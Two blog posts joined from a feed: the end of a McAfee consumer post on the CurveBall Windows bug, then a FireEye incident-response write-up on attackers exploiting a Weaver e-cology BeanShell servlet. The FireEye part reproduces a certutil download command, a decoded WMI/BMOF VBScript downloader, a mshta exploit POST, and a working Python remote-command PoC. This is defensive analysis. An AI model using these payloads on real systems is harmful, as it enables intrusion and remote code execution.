Now, what should you do to protect yourself from the CurveBall vulnerability? At McAfee, we are in the process of deploying an update to keep our loyal users secure from this vulnerability. In the meantime, however, there are a few things you should do to do to protect yourself. Start by following these tips:

  • Update your Windows 10 OS to get the latest security patches.
  • Use caution when surfing the web.
  • Only open files and emails from trusted sources.
  • Update your browsers to the latest versions if available.
  • If you are an enterprise customer, please reference KB92329 for information on McAfee enterprise defense from this vulnerability.
  • Contact McAfee Support if you have any further questions or need assistance.

To stay on top of McAfee news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post What Is the CurveBall Bug? Here’s What You Need to Know  appeared first on McAfee Blogs.

CertUtil Qualms: They Came to Drop FOMBs

This blog post covers an interesting intrusion attempt that FireEye Managed Defense thwarted involving the rapid weaponization of a recently disclosed vulnerability combined with the creative use of WMI compiled “.bmf” files and CertUtil for obfuscated execution.

This intrusion attempt highlights a number of valuable lessons in security, chiefly: attackers work fast – faster than many security teams can react. Additionally, patching complex software environments while keeping the business operational makes it difficult to keep pace with attackers exploiting vulnerabilities, especially when these truths are coupled with rapid exploitation with innovative obfuscation methods utilizing the operating systems own feature set against it.

Everybody’s Working for the Recon

While monitoring our customers around the clock, FireEye Managed Defense identified suspicious file write activity on a system at a European manufacturing client and began our initial investigation by collecting the available volatile and non-volatile data from the affected host. Once evidence collection had completed, we began parsing the forensic data using the parsers available in FireEye's free Redline forensic analysis tool. Analysis of the logs quickly revealed that there were commands executed on the host which were consistent with interactive reconnaissance activity. Typically, once a host has successfully been compromised, attackers are presented with a command shell window which allows them to run commands on the host. These commands can consist of reconnaissance activity which expose useful information about the host to the attacker. The following is a snippet of the commands that we observed successfully executed on the host:  

ipconfig.exe ipconfig /all
whoami.exe whoami

The associated parent process that handled execution of the aforementioned listed processes was: "\Weaver\jdk_new\bin\javaw.exe". 

FOMBs AWAY!

Once the attackers gained access to the web server by exploiting an unknown vulnerability, they attempted to further pivot control within the system through the use of Windows Management Instrumentation (WMI). They leveraged WMI's execution process, which takes Managed Object Format (MOF) files as input and compiles them into the WMI buffer, resulting in a compiled “.bmf” output file. The attackers wrote their second-stage payload and compiled it with WMI. Finally, they uploaded the compiled “.bmf” file to their web server and modified the file to masquerade as a ".rar" file .

Upon further assessment of the activity, we observed that after the threat actors gained access to the affected web server, they utilized a Windows native binary called “Certutil.exe” to download malicious code from a remote resource. Our investigation revealed that an instance of the process “Certutil.exe” was executed with the following command line arguments:   

certutil  -urlcache -split
-f http://[DOMAIN]/uploads/180307/l.rar c:\windows\temp\l.rar

Options

Description 

-urlcache 

Display or delete URL cache entries

-split 

Split embedded ASN.1 elements, and save to files

 

-f 

Force overwrite

(Source: Microsoft certutil page)

FireEye has observed this methodology executed numerous times by both ethical hackers and unauthorized threat actors in addition to Certutil’s benign use as a part of legitimate business applications and operations.

Shortly after the second-stage payload was downloaded, we observed several file write events related to `l.rar` (MD5: 4084eb4a41e3a01db2fe6f0b91064afa). Of particular note were: 

cmd.exe  cmd /c mofcomp.exe C:\Windows\temp\l.rar
cmd.exe cmd /c del C:\Windows\temp\l.rar

The aforementioned commands utilize Window's "cmd.exe" interpreter to run "mofcomp.exe" on the newly obtained "l.rar". This process is designed to parse a file containing MOF statements and add any class and class instances defined in the file to the WMI repository, and subsequently delete the aforementioned file.

The use of “mofcomp.exe” for attackers and defenders was first proposed at MIRcon 2014 by FireEye Mandiant incident responders Christopher Glyer and Devon Kerr in their “There’s Something about WMI” talk (Figure 1).


Figure 1: Proposed use of MOF files for red and blue teams

We obtained the file "l.rar" for further analysis and observed that the file header began with "FOMB". This file header when conveniently flipped is "BMOF", as in Binary Managed Object Format. With this information in hand we began searching for methods to reverse the compiled binary. Upon analyzing the file in FireEye's sandbox environment, we were able to obtain the following information from the BMOF file:

On Error Resume Next:execmydler():Function execmydler():Set
P=CreateObject("WinHttp.WinHttpRequest.5.1"):P[.]Open
"GET","hxxp[://[DOMAIN]/d/dl[.]asp",0:P[.]Send():b=P[.]responseText:M=Spli
t(b,",",-1,1):For Each Od In M:Nd=Nd+Chr(Od-
2):Next:Set P=Nothing:If Len(Nd) > 10 Then:Execute(Nd):End If:End

In an attempt to masquerade activities, the attackers wrote an MOF script and compiled it into a BMOF file, then ran the malicious BMOF file on the victim machine via WMI. The aforementioned code attempts to download a second-stage payload from "hxxp[://[DOMAIN]/d/dl[.]asp" when executed. Since the WMI buffer is involved, this attack vector opens the door to gaining a persistent foothold in the victim environment.

During this research period we also found an open-sourced project titled "bmfdec" that also decompiled BMOF files. 

Uncovering the Exploit

The attackers were active on September 22, and as such the majority of the investigation was conducted around this timeframe. Analysis of FireEye Endpoint Security ring buffer events uncovered reconnaissance commands executed on the system including whoami, ipconfig and the downloading of additional binaries. However, further analysis of the system did not uncover an initial exploit within the same timeframe of these commands. Analysis of the HTTP logs also did not uncover the initial payload. Within the HTTP logs we identified suspicious HTTP POST requests including requests to ’/weaver/bsh.servlet.BshServlet/`, but this was a busy server and the payload was not included in the logging, only metadata.

Example HTTP log entry

'-` 2886000` 10.10.10.10` -` -` "[23/Sep/2019:10:10:10 +0800]"` "POST
/weaver/bsh.servlet.BshServlet/ HTTP/1.1"`  "-"'

FireEye Endpoint Security has the ability to collect a memory image and this was completed on the same day as the initial activity. As memory is volatile, the earlier it's collected in an investigation the more likely you are to uncover additional evidence. We used Volatility to analyze the memory image looking for any suspicious event log entries, process creation, registry entries, etc. While reviewing the memory image, we identified numerous instances of mshta.exe spawned under javaw.exe, the creation date for these processes was 2019-09-20, and we pivoted our investigative focus to that date.

.. httpd.exe            2388    604      3     84 2019-06-28 09:32:53 UTC+0000 
... java.exe            2420   2388      0 ------ 2019-06-28 09:32:53 UTC+0000 
.... javaw.exe          4804   2420     36    530 2019-06-28 09:33:19 UTC+0000 
..... javaw.exe         5976   4804    177   4925 2019-06-28 09:33:21 UTC+0000 
...... mshta.exe       17768   5976     12    320 2019-09-20 14:20:00 UTC+0000 
...... mshta.exe        9356   5976     12    306 2019-09-20 11:12:04 UTC+0000 
...... mshta.exe       22416   5976     12    310 2019-09-20 11:31:14 UTC+0000 
...... mshta.exe       23240   5976     13    318 2019-09-20 14:20:01 UTC+0000 
...... mshta.exe       15116   5976     12    311 2019-09-20 11:31:23 UTC+0000 

This matched our initial findings and gave us some further context. Unfortunately, the initially-acquired forensic evidence, including the endpoint triage package and the memory image, did not provide a conclusive filesystem narrative around that date. At this stage the client had pulled the system offline and began remediation steps, however we still didn't know exactly which exploit was leveraged to gain a foothold on this system. We knew the process path which indicated it was httpd.exe being leveraged to run malicious javaw.exe commands. This lined up with our HTTP log analysis, yet we didn't have the payload.

String it to Weaver

Anybody who's worked in incident response long enough knows that when parsing the data has failed to uncover the evidence you're looking for, the last thing you can try is sifting through the raw bytes and strings of a file. Volatility has a handy feature to map the string offset to the corresponding process and virtual address. Once this is complete grep searching for specific keywords and filtering through the strings identified a number of HTTP POST requests sitting in unallocated space, expanding our grep using it's context parameter uncovered interesting HTTP POST requests and their payload.

Example POST payload:

POST /weaver/bsh.servlet.BshServlet/ HTTP/1.1
Host: x.x.x.x:88
Connection: close
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
Accept-Language: en-US,en;q=0.5
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 134
bsh.script=eval .("ex"+"ec(\"mshta hxxp:// www[DOMAIN]/index[.]hta\")");&bsh.servlet.output=raw23; languageidweaver=7; testBanCookie=test; JSESSIONID=xxxxxxxxxx; Systemlanguid=7
tBanCookie=test; Systemlanguid=7; loginidweaver=xxx
st; Systemlanguid=7; loginidweaver=xxx

We knew this was the exploit we were looking for. The payload was exactly what the attacker was executing and the URI confirmed the process path we had identified from the memory image. It was making a request to BshServlet. It was unclear if this vulnerability was known, as there was no CVE associated with the software. Open source research identified a number of Chinese blog sites discussing a newly identified RCE vulnerability with Weaver e-cology OA system. The vulnerability lies within the BeanShell component of the OA system. The attacker could send a specially crafted payload to ’\weaver/bsh.servlet.BshServlet` in order to launch arbitrary commands. The following POC script was discovered on one of the aforementioned Chinese blog sites.

MD5: 49b23c67c2a378fb8c76c348dd80ff61

import requests
import sys   

headers = { 
   'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25', 
   'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 
   'Accept-Language': 'zh-CN,zh;q=0.9', 
   'Content-Type': 'application/x-www-form-urlencoded'
}   

  

def exploit(url,cmd): 
   target=url+'/weaver/bsh.servlet.BshServlet' 
   payload='bsh.script=eval%00("ex"%2b"ec(\\"cmd+/c+{}\\")");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw'.format(cmd) 
   res=requests.post(url=target,data=payload,headers=headers,timeout=10) 
   res.encoding=res.apparent_encoding 
   print(res.text)   

if __name__ == '__main__': 
   url=sys.argv[1] 
   while(1): 
       cmd=input('cmd:') 
       exploit(url,cmd)   

The script contained some hardcoded HTTP header values including user-agent, accepted data types, accepted languages and content-type. The script builds an HTTP request and allows the user to specify the command they would like to run; it would then append the URL and command to the crafted exploit to execute. In our instance the attacker was leveraging this vulnerability to launch mshta.exe to download a second stage payload.

Using search engines for internet connected devices such as Shodan or Censys we can quickly identify systems running the Weaver e-cology platform. Using this technique, we identified 28 internet facing system that are potentially vulnerable.

Conclusion

This isn't a new story; Managed Defense responds to cases like this every week. The usage of FOMB was particularly interesting in this instance and it's the first case in Managed Defense we've seen this technique being leveraged in an attempt to bypass defenses. When leveraged correctly, compiled “.bmf” files can be effectively used to sneak into an environment undetected and gain a foothold via persistence in the WMI buffer.

There are many procedural and technical controls that could help prevent a system being compromised. Most larger enterprises are complex and identifying all publicly exposed software and services can be challenging. We’ve worked on many cases where system administrators didn’t believe their system was directly accessible from the internet only to later confirm it was. Prioritizing particular patches can be difficult and if you don’t think a RCE vulnerability is exposed then the Risk level might be incorrectly classified as low.

A combination of controls is typically the best approach. In Managed Defense we assume these controls are imperfect and attackers will find a way to bypass them. Deploying strong monitoring capabilities combined with a team of analysts hunting through lower fidelity signatures or “weak signals” can uncover otherwise unnoticed adversaries.

Learn more about FireEye Managed Defense here.

Weaver Build Timeline

  • 2019-09-20: Weaver Patch released
  • 2019-09-20: Exploit observed in Managed Defense
  • 2019-09-22: Exploit POC blogged
  • 2019-10-03: First public mention outside China

References